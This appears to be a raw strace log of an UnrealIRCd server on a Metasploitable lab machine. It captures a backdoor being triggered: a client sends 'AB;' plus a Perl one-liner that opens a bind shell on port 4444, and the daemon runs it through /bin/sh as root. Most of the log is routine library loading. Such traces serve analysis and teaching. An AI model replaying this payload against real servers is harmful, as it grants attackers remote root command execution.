4519  07:32:34.991157 select(1024, [2 3 4 7 9], [], NULL, {0, 950000}) = 1 (in [2], left {0, 760000})

4519  07:32:35.172938 clock_gettime(CLOCK_MONOTONIC, {2364, 989962084}) = 0

4519  07:32:35.172963 accept(2, 0, NULL) = 5

4519  07:32:35.173002 getpeername(5, {sa_family=AF_INET, sin_port=htons(40143), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:32:35.173035 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:32:35.173047 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:32:35.173082 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:32:35.173111 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:32:35.173163 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:32:35.173174 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:32:35.173189 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:32:35.173206 clock_gettime(CLOCK_MONOTONIC, {2364, 990220419}) = 0

4519  07:32:35.173219 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:32:35.173231 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:32:35.173240 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:32:35.173250 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:32:35.173260 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:32:35.173276 send(6, "\336E\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:32:35.173460 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:32:35.173487 gettimeofday({1495625555, 173491}, NULL) = 0

4519  07:32:35.173499 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:32:35.178373 clock_gettime(CLOCK_MONOTONIC, {2364, 995391255}) = 0

4519  07:32:35.178391 recvfrom(6, "\336E\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\16\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:32:35.178432 close(6)          = 0

4519  07:32:35.178461 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:32:35.178503 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:32:35.178576 time(NULL)        = 1495625555

4519  07:32:35.178588 time(NULL)        = 1495625555

4519  07:32:35.178605 gettimeofday({1495625555, 178609}, NULL) = 0

4519  07:32:35.178617 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:32:35.178646 clock_gettime(CLOCK_MONOTONIC, {2364, 995659224}) = 0

4519  07:32:35.178657 gettimeofday({1495625555, 178660}, NULL) = 0

4519  07:32:35.178667 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:32:35.178990 clock_gettime(CLOCK_MONOTONIC, {2364, 996005395}) = 0

4519  07:32:35.179019 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:32:35.179048 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:32:35.179068 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:32:35.179081 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:32:35.179096 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10349

10349 07:32:35.179169 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10349 07:32:35.179183 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10349 07:32:35.179194 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10349 07:32:35.179207 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10349 07:32:35.179326 brk(0)            = 0x80f9000

10349 07:32:35.179348 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10349 07:32:35.179364 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f2f000

10349 07:32:35.179380 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10349 07:32:35.179399 open("/etc/ld.so.cache", O_RDONLY) = 1

10349 07:32:35.179411 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10349 07:32:35.179430 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f27000

10349 07:32:35.179502 close(1)          = 0

10349 07:32:35.179529 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10349 07:32:35.179546 open("/lib/libncurses.so.5", O_RDONLY) = 1

10349 07:32:35.179559 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10349 07:32:35.179655 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10349 07:32:35.179673 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef7000

10349 07:32:35.179686 mmap2(0xb7f24000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f24000

10349 07:32:35.179703 close(1)          = 0

10349 07:32:35.179715 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10349 07:32:35.179729 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10349 07:32:35.179743 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10349 07:32:35.179834 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10349 07:32:35.179851 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef3000

10349 07:32:35.179862 mmap2(0xb7ef5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ef5000

10349 07:32:35.179878 close(1)          = 0

10349 07:32:35.179889 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10349 07:32:35.179906 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10349 07:32:35.179920 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10349 07:32:35.180021 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10349 07:32:35.180038 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef2000

10349 07:32:35.180053 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da3000

10349 07:32:35.180064 mmap2(0xb7eec000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eec000

10349 07:32:35.180079 mmap2(0xb7eef000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eef000

10349 07:32:35.180093 close(1)          = 0

10349 07:32:35.180115 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7da2000

10349 07:32:35.180128 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7da26b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10349 07:32:35.180183 mprotect(0xb7eec000, 4096, PROT_READ) = 0

10349 07:32:35.180220 munmap(0xb7f27000, 29913) = 0

10349 07:32:35.180246 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10349 07:32:35.180260 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10349 07:32:35.180279 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa89440) = -1 ENOTTY (Inappropriate ioctl for device)

10349 07:32:35.180309 brk(0)            = 0x80f9000

10349 07:32:35.180319 brk(0x80fa000)    = 0x80fa000

10349 07:32:35.180330 brk(0x80fb000)    = 0x80fb000

10349 07:32:35.180346 getuid32()        = 0

10349 07:32:35.180356 getgid32()        = 0

10349 07:32:35.180365 geteuid32()       = 0

10349 07:32:35.180374 getegid32()       = 0

10349 07:32:35.180387 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10349 07:32:35.180401 time(NULL)        = 1495625555

10349 07:32:35.180413 brk(0x80fc000)    = 0x80fc000

10349 07:32:35.180427 brk(0x80fd000)    = 0x80fd000

10349 07:32:35.180432 open("/proc/meminfo", O_RDONLY) = 1

10349 07:32:35.180433 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10349 07:32:35.180433 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f2e000

10349 07:32:35.180433 read(1, "MemTotal:      1035240 kB\nMemFree:        419724 kB\nBuffers:         76948 kB\nCached:         379172 kB\nSwapCached:          0 kB\nActive:         256380 kB\nInactive:       328700 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        419484 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4584 kB\nWriteback:           0 kB\nAnonPages:      128960 kB\nMapped:          51968 kB\nSlab:            19124 kB\nSReclaimable:    10560 kB\nSUnreclaim:       8564 kB\nPageTables:       1952 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10349 07:32:35.180433 close(1)          = 0

10349 07:32:35.180433 munmap(0xb7f2e000, 4096) = 0

10349 07:32:35.180434 brk(0x80fe000)    = 0x80fe000

10349 07:32:35.180449 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10349 07:32:35.180462 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10349 07:32:35.180474 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10349 07:32:35.180486 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10349 07:32:35.180498 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10349 07:32:35.180510 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10349 07:32:35.180524 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10349 07:32:35.180536 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10349 07:32:35.180549 uname({sys="Linux", node="metasploitable", ...}) = 0

10349 07:32:35.180598 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10349 07:32:35.180616 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10349 07:32:35.180634 brk(0x8100000)    = 0x8100000

10349 07:32:35.180659 getcwd("/etc/unreal", 4096) = 12

10349 07:32:35.180701 getpid()          = 10349

10349 07:32:35.180748 getppid()         = 4519

10349 07:32:35.180764 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10349 07:32:35.180784 stat64("/sbin/sh", 0xbfa89418) = -1 ENOENT (No such file or directory)

10349 07:32:35.180796 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10349 07:32:35.180813 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10349 07:32:35.180837 socket(PF_FILE, SOCK_STREAM, 0) = 1

10349 07:32:35.180850 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10349 07:32:35.180862 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10349 07:32:35.180883 close(1)          = 0

10349 07:32:35.180895 socket(PF_FILE, SOCK_STREAM, 0) = 1

10349 07:32:35.180905 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10349 07:32:35.180915 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10349 07:32:35.180933 close(1)          = 0

10349 07:32:35.180947 open("/etc/nsswitch.conf", O_RDONLY) = 1

10349 07:32:35.180961 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10349 07:32:35.180978 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f2e000

10349 07:32:35.180989 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10349 07:32:35.181039 read(1, "", 4096) = 0

10349 07:32:35.181049 close(1)          = 0

10349 07:32:35.181058 munmap(0xb7f2e000, 4096) = 0

10349 07:32:35.181076 open("/etc/ld.so.cache", O_RDONLY) = 1

10349 07:32:35.181088 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10349 07:32:35.181104 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f27000

10349 07:32:35.181115 close(1)          = 0

10349 07:32:35.181125 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10349 07:32:35.181140 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10349 07:32:35.181196 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10349 07:32:35.181304 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10349 07:32:35.181322 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d99000

10349 07:32:35.181334 mmap2(0xb7da0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7da0000

10349 07:32:35.181351 close(1)          = 0

10349 07:32:35.181362 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10349 07:32:35.181376 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10349 07:32:35.181390 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10349 07:32:35.181478 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10349 07:32:35.181495 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d81000

10349 07:32:35.181506 mmap2(0xb7d95000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d95000

10349 07:32:35.181521 mmap2(0xb7d97000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d97000

10349 07:32:35.181535 close(1)          = 0

10349 07:32:35.181561 munmap(0xb7f27000, 29913) = 0

10349 07:32:35.181578 open("/etc/ld.so.cache", O_RDONLY) = 1

10349 07:32:35.181591 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10349 07:32:35.181607 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f27000

10349 07:32:35.181617 close(1)          = 0

10349 07:32:35.181627 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10349 07:32:35.181655 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10349 07:32:35.181672 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10349 07:32:35.181766 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10349 07:32:35.181783 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d77000

10349 07:32:35.181795 mmap2(0xb7d7f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d7f000

10349 07:32:35.181811 close(1)          = 0

10349 07:32:35.181824 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10349 07:32:35.181837 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

